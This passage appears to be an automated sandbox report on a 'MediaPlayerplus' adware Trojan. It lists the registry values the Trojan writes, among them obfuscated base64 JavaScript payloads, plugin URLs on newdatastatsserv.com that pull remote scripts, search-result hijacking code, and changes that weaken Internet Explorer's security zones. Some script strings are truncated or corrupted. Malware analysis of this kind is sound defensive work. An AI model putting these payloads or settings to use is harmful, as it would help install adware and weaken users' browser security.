"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,47,269,93,102,104,180,184,192,220,195,211,221,223,226,230,233,242,244,253,260,262,263,273,275,281,286,289,91"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\MPlayerplus_01\Plugins\286]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/286.js"

[HKCU\Software\MPlayerplus_01\Plugins\289]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/289.js"

[HKCU\Software\MPlayerplus_01\Manifest]
"PublisherName" = "Freeven"

[HKCU\Software\MPlayerplus_01\Plugins\269]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2ZjYzNTExZjFmMWMxMjNhMDIxODQ3NTA1MzU1MDMxYzE2MWY0YTViNGExYTBiNTkwNjExMDMwYzA0MWQxMzBmMDAwMzBhMWMxMTQxMTMxYjA4NDUxMjE0MWYwMTE0MGE1ZjFkMDA0NDE5MDQ1NDFhMGMwYjRkMmIzYTM4M2QzMzM0Mzc0MDQzN2E3ZDQ3MDIwNzAzMWIxYjM3MWQxYzU2NWY0YTUxMWYxZjFjMTIxYzRhNWI0YTA4NDAxOTUzMDY1MTAxNDI1YTE2MTkxZjU5MDMxZjAxMGIxZTVhMGIwZjA3NTgwYTBiMTYwNjA2MTE0YTAzMTY1OTAxMWI1ZDFkMWUxMDU4MzUyYzI1MjUyYzNkMzA1MjU4NmY2MzUxMDcwNzFkMDUwNjFlM2QwMTQ4NDk1NzU5NWU1YjY1MGQ=', 'tejswkhbop'); }"

[HKCU\Software\MPlayerplus_01\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)4-"

[HKCU\Software\MPlayerplus_01\Manifest]
"ChangePrevious" = "false"

[HKCU\Software\MPlayerplus_01\Plugins\47]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/47.js"

[HKCU\Software\MPlayerplus_01\Plugins\244]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins\17]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/17.js"

[HKCU\Software\MPlayerplus_01\Plugins\37]
"Version" = "6"

[HKCU\Software\MPlayerplus_01\Plugins\233]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDE2NzdiNGMxZDEwMTIxZTM2MDcxNjRmNDg0ZTU3MGMxMjFhMTM0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0ZjFhMWEwMTE0MTUzYjExMTk1ODU3NTI0YzFkMTAxMjFlMTA0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0ZjAyMDIwMDAzMGYwMDJhMTE1ODU3NTI1YzQ2NTc0YTY0NDM1NTVhNGQ1MDE4MTAxNjEyMDcwMDE0MTY0ZjQ4NGUyZTQ2MDcwYTEwNTcyNzQxNzg0ZTU1NDQ0NjRjMGExYjE2MDQxYzBiM2YzNzQ0NTQ0MzU3MGQwNDFjMGExYTEzNDgzMTExMDMwMDVjNDU1ZTQ1MWM1NzVlNTY0NTVhNTA1MjE1NTU0MzE2MWIwMTE5MTMxZTFhMGIwNzNiMTUxYjAxMWMxZTRhNDg0ZTUyM2IzOTJkMzEzYTI5M2UyMDI3MzEyMTM0MzEyNjJkMmUyODNjMmEzMDIwMzkzZDM2MzcyNTI0MzYzMTJhNDM0YTRlNDQxNDFlMDkxZDAwMWIwNTBiMGI0NDRmNWE0YTJkMzEzNjM2MjkzZDMwMjczMzI5MzczYzJhMjUzNjNlM2MzYjNiMjAzNzMxMmE0MzFiNTU0MTdmMDc=', 'zmrnudfncu'); }"

[HKCU\Software\MPlayerplus_01\Plugins\37]
"Name" = "IEBrowserEvents"

[HKCU\Software\MPlayerplus_01\Plugins\102]
"Name" = "dealply_m"

[HKCU\Software\MPlayerplus_01\Plugins\13]
"Name" = "CrossriderAppUtils"

[HKCU\Software\MPlayerplus_01\Plugins\281]
"Version" = "2"

[HKCU\Software\MPlayerplus_01\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.seí¥ƒ)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\MPlayerplus_01\Plugins\221]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/221.js"

[HKCU\Software\MPlayerplus_01\Plugins\260]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI3MDdiNTQwZDAwMTYxZjNkMWYxYzU4NDg1NjQ3MWMxNjFiMTg1NzVmNTUwNTA1NGIwNDEwMDYwYjA4MTQxZjA2MTMwNjAwNGMwYzA3MDA1ZjA5NWQwNjAxMWUxMTVhNWI1YjQyNGIxMzQ2NTM0NTU1MGI1YjA5NWUxMDAxNDkxNjFkMDY1MjM3MzIzMzI4M2QyNTM2MjYyYjJiMmQzZjJmM2YyYTIyMjAzYTI2MmEyYzMyMjMyZjMwMjkyYzMwM2QzMDRlMGMwMDBhMWMxNzA4MTE1ZjMwMzcyZTIyMzUyMTI1MzczZDI2MmEzYTMyMzEyYTIyMjkyYjM1MmYyYTM3MzI1MjU2Nzg3ZjQ3MWMxNjFiMTgxZTI1MDgxZTU0NWY1NDQwMDcxYzE5MDAwOTQ4NTk0YTAzMTE0MTE4MWYxOTE5MTcxMjAwMDAwNzBjMWM0MzEzMTUxZjU5MTY1YjEyMGIwMjFlNDU0OTQ0NDQ1NDE1NTI1OTU5NWExNDQ5MTY1ODBmMDc1ZDFjMDEwOTRkMjUyZDM1MzczYjMxM2MzYTI0MzQzZjIwMjkyMDJjMzYyYTI2MjkzNTNlMmQyNTMwMzYzZDI2MmMzMjJmNWMxMzA2MTUxYTAzMDIwZDUwMmYyNTMxMjQyYTI3MzEzZDIxMjkzNTI4MmQzNzM1MjQzZDIxMjkyMDM1MjUyZDU0NDk3ZTZiNGQxODAxMDUxZDFiMTgyYzEwNDA1NTQ4NWY0NjRhNzgwYg==', 'pzrvetbohm'); }"

[HKCU\Software\MPlayerplus_01\Plugins\220]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/220.js"

[HKCU\Software\MPlayerplus_01\Code]
"NewTabJavaScript" = ""

[HKCU\Software\MPlayerplus_01\Plugins\46]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/46.js"

[HKCU\Software\MPlayerplus_01\Plugins\91]
"Name" = "monetizationLoader.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\MPlayerplus_01\Plugins\226]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.monetization.getCampaignId) { if (appAPI.internal.monetization.getCampaignId() == 0) { appAPI.internal.monetization.loader.setCampaignId(1026); } }};"

[HKCU\Software\MPlayerplus_01\Plugins\289]
"Name" = "covus_logos_m"

[HKCU\Software\MPlayerplus_01\Plugins\220]
"Name" = "icm_base_m"

[HKCU\Software\MPlayerplus_01\Plugins\180]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmIy)"

[HKCU\Software\MPlayerplus_01\Plugins\263]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTA3ODU2NTA0NjU0NTQwZDE4MWIxYjI3MDQxYzQ0NGU1NjQ3MDQxYjFmMDI0YzVmNDkxNzEyMGIwZjBlMDgxYTEzNDE0YjE1NTgwNDA3MGUwNjEzMWYxODAyNWExODAwMTg0MDE4MDcxNDVmMTA0NzQ0NTQ1NTBkMGY1ZDI5MmYyNTI2MzkzNjNmM2QyMjM2MzMyMjM5MzEyZTMxMjkyMTJmMzczMjJmMzUyMTM0M2EyNTJiMzQyZDU5MWM0ODFlMDU1YTFjMDYwZjRmNDc0MDVmNDA1MDAwMTQxYjU2MmQyOTMzMzQzYjI1MzYzZTI2MmYzNzI0MmYyNzI0MjYzYTIyMmUyNjM3MjkyZjQwMDcwZjE2MTgwYTA2MWIxMjRkMzkyYjM1MzcyMzNjMzgyMDNmMzQyMzI2MjkyYzIyM2MzZjMzM2EzYzIzMjYyOTMwM2YyYTM5MmQzZjM0MzkyYjU0NDk2NjRmNGI1MjU2NTIwZTAwMDIxNTFmM2ExOTFlNTQ0YTQ2NTYxZTExMTgxZjE4NDg1OTVmMDUxMDE4MDYwZDBjMDMxNzQ3NWQwNzVhMTcwZTBkMDIwYTFiMWUxNDQ4MWExMzExNDMxYzFlMTA1OTA2NTU0NjQ3NWMwZTBiNDQyZDI5MzMzNDNiMjUzNjNlMjYyZjM3MjQyZjIzMmMyMjIwMjIyYjJlMzYyOTIzMzMzNjI5MmMyODMwMzQ1ZDFhNWUwYzA3NDkxNTA1MGI1NjQzNDY0OTUyNTIxMzFkMTg1MjM0MmQzNTIyMjkyNzI1MzcyNTJiMmUyMDI5MzEzNjI0MjkyYjJkMjIyZTJkMjk1NjE1MGQwNTExMDkwMjAyMTY0YjJmMzkzNzI0MmEzZjNjMzkzYjMyMzUzNDJiM2YyYjNmM2IyYTNlM2EzNTM0MmIyMzM2MjkzZDM0M2IzMjJmMzk1NjVhNmY0YzRmNGI1MjU0MDAwYTAxMTEw)"

[HKCU\Software\MPlayerplus_01\Plugins\242]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/242.js"

[HKCU\Software\MPlayerplus_01\Plugins\273]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\35]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/35.js"

[HKCU\Software\MPlayerplus_01\Manifest]
"UpdateInterval" = "360"

[HKCU\Software\MPlayerplus_01\Plugins\192]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3YTYzNGMxYzA2MTkwNTNlMTQwNjUyNTA0ZTU2MWExOTAxMWI1YzQ1NWYwYjFkMDYwNDQwMTQ0NTA3MDExMTA3MGYxZDFhMDk1YjA1MDMxZTVmMTkwYTViNDM1YTQ1NWI0OTViNDA1YTU2NWExODFlNTc0NzZjNjM1MjAyMWEwMDAyMWUyMDE5MGE0ODRhNGE0YzFjMDYxOTA1MTg1YzQ1NWYwYjFkMDYwNDQwMTQ0NTA3MDExMTA3MGYxZDFhMDk1YjA1MDMxZTVmMTkwYTViNDM1YTQ1NWI0OTViNDA1YTU2NWExODFlNTc0NzZjNjM1MjFhMDIwMTE1MDQxYjIyMDI0ODRhNGE1ZjRkNDA0MTdmNGI0NjRhNTA0ODE4MTEwMDE5MWMwODA3MDY1MjUwNGUyZjUwMGMxMTE4NDQzNzVjNjA0ZTU0NTI0ZDU3MDIwODA2MTkwNDBiM2UyMTRmNGY0YjQ0MWQxOTA0MGExYjA1NDMyYTE5MTAxMDQxNWQ1ZTQ0MGE1YzQ1NWI1ZTRhNGQ0YTE1NTQ1NTFkMDAwOTBhMDMwMzAyMGIwNjJkMWUwMDA5MGYwZTU3NTA0ZTUzMmQzMjM2MzkyOTM5MjMzODI3MzAzNzNmMmEyZTNlM2UzNTI0MmEzMTM2MzIyNjNlMjQzNTM5MmUzMTJiNTU0MTU1NGMwNzBlMTQwNTAwMWExMzAwMTA0YzVjNGE1NzM1MzEzNzIwMjIyNjM4MzQyMzM0MmYzYzJiMzMzZDI1MzQyODJiM2QyZjMxMmI1NTEwNGU0OTZjMTc=', 'jpjntrmukf'); }"

[HKCU\Software\MPlayerplus_01\Plugins\46]
"Name" = "IETimers"

[HKCU\Software\MPlayerplus_01\Plugins\244]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2NDdlNTcxZTFhMGMxMzJmMDAxODRjNGQ1NTU0MDYwYzE3MGE0ODViNDExMjBkMDI1YzU2MDYxNDE1MTUwOTEyMGMxNzQwMWIwYzE3NWQwMzA3MTMxMjEzMWE1NzBhMTQxODExMGQwMzJhMDUxZTE5MTExMTVkMWQwMDFkMmEwNTFlMGEwODI1MDEwMDBmMDUwMTEzMWM1NjA5MDk0ZDA0MDcxMzQ4M2EzYTNkMTAzNTM2MzU1ZjM4MzEyNzFkMzUwOTFkNDEzOTA0M2UwNjM4MmExYjU3MzUyNjM1NGI0NDMxNTAxZDBkMDExMzE2NDkzMTI4MzYyNDIxMmIzMDI4M2IzMDJiMjUyYTMzMzYyYzI2MzQzNjMxMmEyODI2MjMyYzI3MmEzZTJkMmI0ODE2MDUwNjAwMTkwZTFmNGYyYjMxMzQyNzM5M2QyYjMxMzMzNjMxM2MyODM0MjYzZTI3MmQzYjNmMzEzMTI4NTc1YTY0NzE0MTEyMDYwMDFlMDQyMDA0MDI1YTU5NWE1MDFjMWEwMzA1MDU1NDU3NGMxZjBhMDA1YzU5MTAxODA5MTkwNDFmMGIxNTQwMTQxYTFiNDEwZjBhMWUxNTExMWE1ODFjMTgwNDFkMDAwZTJkMDcxZTE2MDcxZDQxMTEwZDEwMmQwNzFlMDUxZTI5MWQwYzAyMDgwNjExMWM1OTFmMDU1MTA4MGExZTRmMzgzYTMyMDYzOTJhMzk1MjM1MzYyNTFkM2ExZjExNWQzNTA5MzMwMTNhMmExNDQxMzkzYTM5NDY0OTM2NTIxZDAyMTcxZjBhNDUzYzI1MzEyNjIxMjQyNjI0MjczYzI2MjgyZDMxMzYyMzMwMzgyYTNkMjcyNTIxMjEyYzI4M2MzMjMxMjc0NTFiMDIwNDAwMTYxODEzNTMyNzNjMzkyMDNiM2QyNDI3M2YyYTNkMzEyNTMzMjQzZTI4M2IzNzIzM2Qz)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\MPlayerplus_01\Plugins\262]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/262.js"

[HKCU\Software\MPlayerplus_01\Plugins\2]
"Version" = "2"

[HKCU\Software\MPlayerplus_01\Plugins\4]
"Name" = "jquery_1_7_1"

[HKCU\Software\MPlayerplus_01\Plugins\269]
"Version" = "1"

[HKCU\Software\MPlayerplus_01\Manifest]
"Name" = "MediaPlayerplus"

[HKCU\Software\MPlayerplus_01\Plugins\260]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Installer]
"osName" = "XP32"

[HKCU\Software\MPlayerplus_01\Plugins\13]
"Version" = "7"

[HKCU\Software\MPlayerplus_01\Plugins\286]
"Version" = "2"

[HKCU\Software\MPlayerplus_01\Manifest]
"IsButtonEnabled" = "false"

[HKCU\Software\MPlayerplus_01\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;}㤰-"

[HKCU\Software\MPlayerplus_01\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveu-"

[HKCU\Software\MPlayerplus_01\Plugins\275]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/275.js"

[HKCU\Software\MPlayerplus_01\Plugins\233]
"Version" = "7"

[HKCU\Software\MPlayerplus_01\Plugins\64]
"Version" = "3"

[HKCU\Software\MPlayerplus_01\Plugins\38]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/38.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\MPlayerplus_01\Manifest]
"PublisherId" = "21636"

[HKCU\Software\MPlayerplus_01\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

  • '});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'
  • '});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'
  • '});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'
    '});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:ask,url)"

    [HKCU\Software\MPlayerplus_01\Plugins\180]
    "Name" = "bpo_serp_m"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\MPlayerplus_01\Plugins\104]
    "URL" = "http://js.newdatastatsserv.com/plugins/mins/104.js"

    [HKCU\Software\MPlayerplus_01\Plugins\211]
    "URL" = "http://js.newdatastatsserv.com/plugins/mins/211.js"

    [HKCU\Software\MPlayerplus_01\Plugins\273]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTA2MTRmNDU1OTUwNDQwNjE1MDUxYjNlMWQwOTViNGE0NjRjMDkwNTFmMWI1NTRhNTYxNDU3MWYxMDE1MGYxZTA5MDQxNTQ0MDI1YjU5NWYwODA3MDAxMDFkMTYxNDAxMGYwNTQ1MDUwYTExNTYwMzA1MWMwODAxMWYxODQwMDYxNjFlMTIwYjE5MDUxZTBhMDMwZjBhNWYxMDVjNGUxMjFmMTMwNTE2NTcxYTE1NTEwMDE3MGQzNDA2MDE0NDQxNTc1YTU0NTcxODFlMGQwNDFmMTYzOTA3MDU0YzM0MzQyYzM3MzYyMzM1M2MyODM1MmUzOTMwMjAyMTI0MjMyMDI1MzQyZjM0M2MzMDNiMmYyZjJhM2UyZTRkMTgwZDE3MTgxZTAyNTMzZTJlMjgzOTIwMzYyYTIyMmYyYTI0MjMzNDJhM2YzNTI2M2UyNzIzMjQyZTM0NDk0MzZmNTk1MDQ2NGU0MzE5MWYxZjFmMTYyYzAyMGE0YzViNTE0OTAzMWIxMTA5MDM1YzQxNGUxNTVhMWExZTAxMWQwNTAwMGYwZDQ1MGY1ZTU3NGIxYTFjMDkxYjA1MTcxOTA0MDExMTU3MWUwMzFhNGUwMjA4MTkwNjE1MGQwMzQ5MGQwZTFmMWYwZTE3MTEwYzExMGEwNDEyNWUxZDU5NDAwNjBkMDgwYzFkNGYxYjE4NTQwZTAzMWYyZjBmMGE1YzQwNWE1ZjVhNDMwYTA1MDQwZjA3MTczNDAyMGI1ODI2MmYyNTNjMmUyMjM4MzkyNjIxM2MyMjM5MmIzOTI1MmUyNTJiMjAzZDJmMzUzYjIzMmUyMjJmMzAzYTVmMDMwNDFjMDAxZjBmNTYzMDNhM2EyMjI5M2QzMjIzMjIyZjJhMzcyNjMxMzYzZTNlM2YyYTI2MmEzYTI2NTI0YTY0NDE1MTRiNGI0ZDE1MTUwNTAxMDcwZjM4MGY0OTU1NDU0YjQ3NTU2)"

    [HKCU\Software\MPlayerplus_01\Plugins\104]
    "Version" = "12"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The Trojan deletes the following registry key(s):

    [HKCU\Software\MPlayerplus_01\Plugins\41]
    [HKCU\Software\MPlayerplus_01\Plugins\40]
    [HKCU\Software\MPlayerplus_01\Plugins\2]
    [HKCU\Software\MPlayerplus_01\Plugins\28]
    [HKCU\Software\MPlayerplus_01\Plugins\45]
    [HKCU\Software\MPlayerplus_01\Plugins\44]
    [HKCU\Software\MPlayerplus_01\Plugins\47]
    [HKCU\Software\MPlayerplus_01\Plugins\46]
    [HKCU\Software\MPlayerplus_01\Plugins\42]
    [HKCU\Software\MPlayerplus_01\Plugins\22]
    [HKCU\Software\MPlayerplus_01\Plugins\21]
    [HKCU\Software\MPlayerplus_01\Plugins\190]
    [HKCU\Software\MPlayerplus_01\Plugins\191]
    [HKCU\Software\MPlayerplus_01\Plugins\1]
    [HKCU\Software\MPlayerplus_01\Plugins\220]
    [HKCU\Software\MPlayerplus_01\Plugins\221]
    [HKCU\Software\MPlayerplus_01\Plugins\226]
    [HKCU\Software\MPlayerplus_01\Plugins]
    [HKCU\Software\MPlayerplus_01\Plugins\7]
    [HKCU\Software\MPlayerplus_01\Plugins\9]
    [HKCU\Software\MPlayerplus_01\Plugins\207]
    [HKCU\Software\MPlayerplus_01\Plugins\253]
    [HKCU\Software\MPlayerplus_01\Plugins\104]
    [HKCU\Software\MPlayerplus_01\Plugins\103]
    [HKCU\Software\MPlayerplus_01\Plugins\102]
    [HKCU\Software\MPlayerplus_01\Plugins\195]
    [HKCU\Software\MPlayerplus_01\Plugins\38]
    [HKCU\Software\MPlayerplus_01\Plugins\39]
    [HKCU\Software\MPlayerplus_01\Plugins\72]
    [HKCU\Software\MPlayerplus_01\Plugins\78]
    [HKCU\Software\MPlayerplus_01\Plugins\184]
    [HKCU\Software\MPlayerplus_01\Plugins\183]
    [HKCU\Software\MPlayerplus_01\Plugins\182]
    [HKCU\Software\MPlayerplus_01\Plugins\36]
    [HKCU\Software\MPlayerplus_01\Plugins\35]
    [HKCU\Software\MPlayerplus_01\Plugins\64]
    [HKCU\Software\MPlayerplus_01\Plugins\233]
    [HKCU\Software\MPlayerplus_01\Plugins\37]
    [HKCU\Software\MPlayerplus_01\Plugins\211]
    [HKCU\Software\MPlayerplus_01\Plugins\242]
    [HKCU\Software\MPlayerplus_01\Plugins\244]
    [HKCU\Software\MPlayerplus_01\Plugins\246]
    [HKCU\Software\MPlayerplus_01\Plugins\177]
    [HKCU\Software\MPlayerplus_01\Plugins\43]
    [HKCU\Software\MPlayerplus_01\Plugins\91]
    [HKCU\Software\MPlayerplus_01\Plugins\155]
    [HKCU\Software\MPlayerplus_01\Plugins\94]
    [HKCU\Software\MPlayerplus_01\Plugins\13]
    [HKCU\Software\MPlayerplus_01\Plugins\3]
    [HKCU\Software\MPlayerplus_01\Plugins\17]
    [HKCU\Software\MPlayerplus_01\Plugins\14]
    [HKCU\Software\MPlayerplus_01\Plugins\93]
    [HKCU\Software\MPlayerplus_01\Plugins\4]

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process MPlayerplus_01-codedownloader.exe:2224 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCU\Software\MPlayerplus_01\Plugins\246]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/setup.js"

    [HKCU\Software\MPlayerplus_01\Plugins\21]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Installer]
    "subid" = "0"

    [HKCU\Software\MPlayerplus_01\Plugins\43]
    "Name" = "IEMessaging"

    [HKCU\Software\MPlayerplus_01\Plugins\17]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\41]
    "Name" = "IEInfo"

    [HKCU\Software\MPlayerplus_01\Plugins\22]
